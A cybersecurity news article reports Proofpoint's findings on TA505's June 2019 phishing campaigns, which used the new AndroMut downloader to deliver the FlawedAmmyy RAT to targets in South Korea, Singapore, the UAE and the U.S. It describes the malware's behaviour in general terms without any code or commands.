Threat Management, Malware

TA505 cybergang debuts ‘AndroMut” downloader to deliver FlawedAmmyy RAT globally

The cybercriminal group TA505 appears to have launched two malware campaigns last June, delivering the FlawedAmmyy RAT to victims in multiple countries using the newly created downloader program AndroMut.

Both campaigns infected victims using phishing emails with links for downloading Microsoft Word and Excel files, according to a July 2 blog post by Proofpoint If enabled, the malicious macros embedded within those files would execute an Msiexec command that downloaded and executed AndroMut or the FlawedAmmyy loader. Either way, the loader would deliver the FlawedAmmyy RAT.

One of the campaigns targeted South Koreans, while the other sought out financial institutions in Singapore, the United Arab Emirates and the U.S. In both cases, the subject lines in these phishing emails contained financial document terminologies such as "invoice," "remittance" or "estimate."

Proofpoint reports that AndroMut is written in C++ programming language, communicates with its C2 server via HTTP POST requests, and seems to share certain code and behavior with Andromeda and QtLoader malware (although the researchers expressed low confidence in these overlaps).

AndroMut also features multiple anti-analysis processes, including checking for sandboxing, mouse movement, the Wine emulator and debuggers. And its creates persistence in one of two ways, depending on user privileges: "by either scheduling a task that executes a created LNK file in the Recycle Bin or via the 'Registry run' method," Proofpoint explains.

"With this new June 2019 push, commercial banking verticals in the United States, UAE, and Singapore appear to be the primary targets as part of TA505's usual 'follow the money' behavioral pattern," the Proofpoint blog post concludes. "The new AndroMut downloader, when combined with the FlawedAmmy RAT as its payload, appears to be TA505's new pet for the summer of 2019."


Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.